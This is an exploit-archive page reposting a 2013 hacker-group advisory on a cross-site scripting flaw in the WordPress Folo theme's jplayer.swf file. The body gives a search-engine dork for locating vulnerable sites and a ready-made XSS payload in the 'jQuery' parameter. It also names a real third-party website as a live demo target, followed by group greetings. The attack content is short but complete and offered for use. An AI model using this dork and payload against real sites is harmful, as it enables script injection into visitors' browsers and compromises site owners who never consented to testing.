WordPress Folo Theme Cross Site Scripting

WordPress Folo Theme Cross Site Scripting: Posted Nov 30, 2013; Authored by Darksnipper; WordPress Folo theme suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 6f6a0b653d47d002c0d96429481f77236becff3c3cf8a84c7c394b20619c5ffb; Download | Favorite | View

WordPress Folo Theme Cross Site Scripting

#####################################
Title:Wordpress Folo Theme xss Vulnerability
#####################
##############################################################

  __  __          _____  _      ______ ______ _______ _____
 |  \/  |   /\   |  __ \| |    |  ____|  ____|__   __/ ____|
 | \  / |  /  \  | |  | | |    | |__  | |__     | | | (___
 | |\/| | / /\ \ | |  | | |    |  __| |  __|    | |  \___ \
 | |  | |/ ____ \| |__| | |____| |____| |____   | |  ____) |
 |_|  |_/_/    \_\_____/|______|______|______|  |_| |_____/

##############################################################
#Author:Darksnipper

#Email:Darksnipper@live.com

#####################################
#Home:-  www.MadLeeTs.com
#####################################

#####################################
#Home:-  www.CyberCoderss.Blogspot.com
#####################################

Vendor Link:http://themify.me/themes/folo

Dork:-inurl:"inurl:/wp-content/themes/folo/"

Tested On:- Windows 7,Linux,Windows xp

######################################################################
#P.o.c

http: //127.0.0.1/wp-content/themes/folo/assets/js/jplayer.swf

payload

?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//

Demo:-

krushlicious.com/wp-content/themes/folo/assets/js/jplayer.swf
payload:-
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//


Like:-

http://127.0.01/wp-content/themes/folo/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//



########################################################################
Greetz:1337,Dream.killer,Soul~inj3ct0r,Force-Ex,x3o-1337,Shadow008,H4x0r
Hussy,H4x0rl1f3,Invectus,Sahrawi
Hacker,Madc0de  Haxor,Makman,Sniffer,Retno Pro, Tr4ck3r,b0x,Gujjar
Pcp,P4k Command3r,Pain006,Anon DeXter,
Ap3x Pr3d1at0r,Ment@l Mind,Evan Ricafort,Syndicate,Root Haxor,Kd
Divakar,r00X,,zHC Snipper,All Madleets Members,Kashmiri HackerS.
########################################################################

Top Authors In Last 30 Days

Red Hat 247 files
indoushka 101 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,775)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,536)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,750)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

WordPress Folo Theme Cross Site Scripting

WordPress Folo Theme Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Folo Theme Cross Site Scripting

Share This

WordPress Folo Theme Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems